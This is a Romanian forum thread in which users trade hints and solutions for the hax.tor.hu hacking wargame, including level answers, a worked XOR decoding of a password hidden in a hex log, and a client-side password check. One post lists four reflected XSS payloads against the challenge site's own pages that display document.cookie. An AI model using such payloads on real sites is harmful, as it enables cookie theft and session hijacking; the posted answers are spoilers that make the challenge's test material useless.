Jump to content
shinnok

http://hax.tor.hu/ challenges

Recommended Posts

Care palaria mea aveti idee la 4

IP address is 72.14.221.104. Password is a domain (domain.tld format, no subdomains) that contains the word "art" and resolves to it. You don't have to buy a domain :)

Reverse IP Domain de pe RST nu merge.

GoogleEarth

Te astept la 7... sa imi zici daca treci :)

Daca bag

googleearth.com imi zice RESOLVED TO IP 64.233.161.104

Daca bag googleart.com zice la alt IP

wtf?

Link to comment
Share on other sites

Care palaria mea aveti idee la 4

IP address is 72.14.221.104. Password is a domain (domain.tld format, no subdomains) that contains the word "art" and resolves to it. You don't have to buy a domain :)

Reverse IP Domain de pe RST nu merge.

GoogleEarth

Te astept la 7... sa imi zici daca treci :)

Daca bag

googleearth.com imi zice RESOLVED TO IP 64.233.161.104

Daca bag googleart.com zice la alt IP

wtf?

http://2ip.ru/server.php?ip=72.14.221.104

googlearth.de asta e solutia :D

Link to comment
Share on other sites

AAaah... 7-le e ala super-complicat. Unde iti da un log in hex, si un link la codul sursa al unui exploit mysql?.. right?... Ala e greu.. stiu ca si mie Grunt (thank you) mi l-a explicat...

Ala e!!! problema e ca trebuie sa adaptezi si logul in hex si exploitul...

Mai incerc....

Actually, te uiti in sursa exploitului, si vezi algoritmul de criptare al parolei. Dupa care te uiti in hex, si cauti... de unde incepe parola, si incepi si o calculezi, manual... HINT: uita-te dupa '^' in exploit ;)

Link to comment
Share on other sites

Pentru un hint mai mare .

Nu trebuie sa te uiti in sursa acelui programel .

Te uiti la descriere sus cum se face criptarea / decriptarea

70 is expanded to 70 00

After the swap the result is: 07 00

XOR with A5: A2 A5

Deci "ca" ar fi

63 - 63 00 = > 36 00 = > 93 A5

61 - 61 00 = > 16 00 = > B3 A5

Ce vedeti ca se tot repeta ? asa gasiti de unde incepe exact parola in log :)

sper sa nu stric jocu :)

Link to comment
Share on other sites

Pentru un hint mai mare .

Nu trebuie sa te uiti in sursa acelui programel .

Te uiti la descriere sus cum se face criptarea / decriptarea

70 is expanded to 70 00

After the swap the result is: 07 00

XOR with A5: A2 A5

Deci "ca" ar fi

63 - 63 00 = > 36 00 = > 93 A5

61 - 61 00 = > 16 00 = > B3 A5

Ce vedeti ca se tot repeta ? asa gasiti de unde incepe exact parola in log :)

sper sa nu stric jocu :)

A5 iz the shit .... :)

Link to comment
Share on other sites

ma poate ajuta cineva la lvl7 ,cel cu exploiyu de sql.am rescris exploitu dar cand decodez texxtul imi afiseaza chestii cam aiurea,ceva de genu "JZJdZ:Z?Œ]|:ZZ?}àZ;ZZ?nÜL¼,?ZZZZZZZZ?Xl¬¼Ý?ZZZZZZZZ?]|(¸ÊZ??ŽoÿîYIZ?dZ

ZZ+?úZZZZZZZ?mÜZœ.ZJ?ZZZZZZZZ?œL¼,

L,?ZZZZZZZZ?X¬X

m¯?ZZZZZZZZ?ZZZZZZZ?IZZ9JZJŽ?ZZZZZZZ?XoOžXo}?=}ZZÚ*d?YÉ9Z?É9…ZZZ"

Link to comment
Share on other sites

M-am blocat la level 28 .

are si niste XSS-uri site-u

http://hax.tor.hu/login/index.php/"><script>alert(document.cookie)</script><a

http://hax.tor.hu/peek/index.php/"><script>alert(document.cookie)</script><

http://hax.tor.hu/board/index.php/"><script>alert(document.cookie)</script><a

http://hax.tor.hu/shellaccount/index.php/"><script>alert(document.cookie)</script><a

Nu prea postez pe aici . De obicei imi place sa citesc :)

Edit : http://hax.tor.hu/peek/index.php/?all=1

Edit2 : Pentru cei care nu stiu ~ indicii

Level 1 : warmup1+solution

Level 2 : SSH

Level 3 : index.php ~ Pear

Level 4 : stick??????

Level 5 : urmatoru'

Link to comment
Share on other sites

:( fratilor inebunesc spunetimi si mie care e parola ca sunt asa de prost ca de nivel 1 nu trec

function a(){

thepw = 'warmup1';

thepw = thepw+'solution';

if (document.lf.pw.value==thepw) {

document.location = '/'+thepw; } else { alert('That is not correct. Please try again.');

}

}

aici e parola?

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...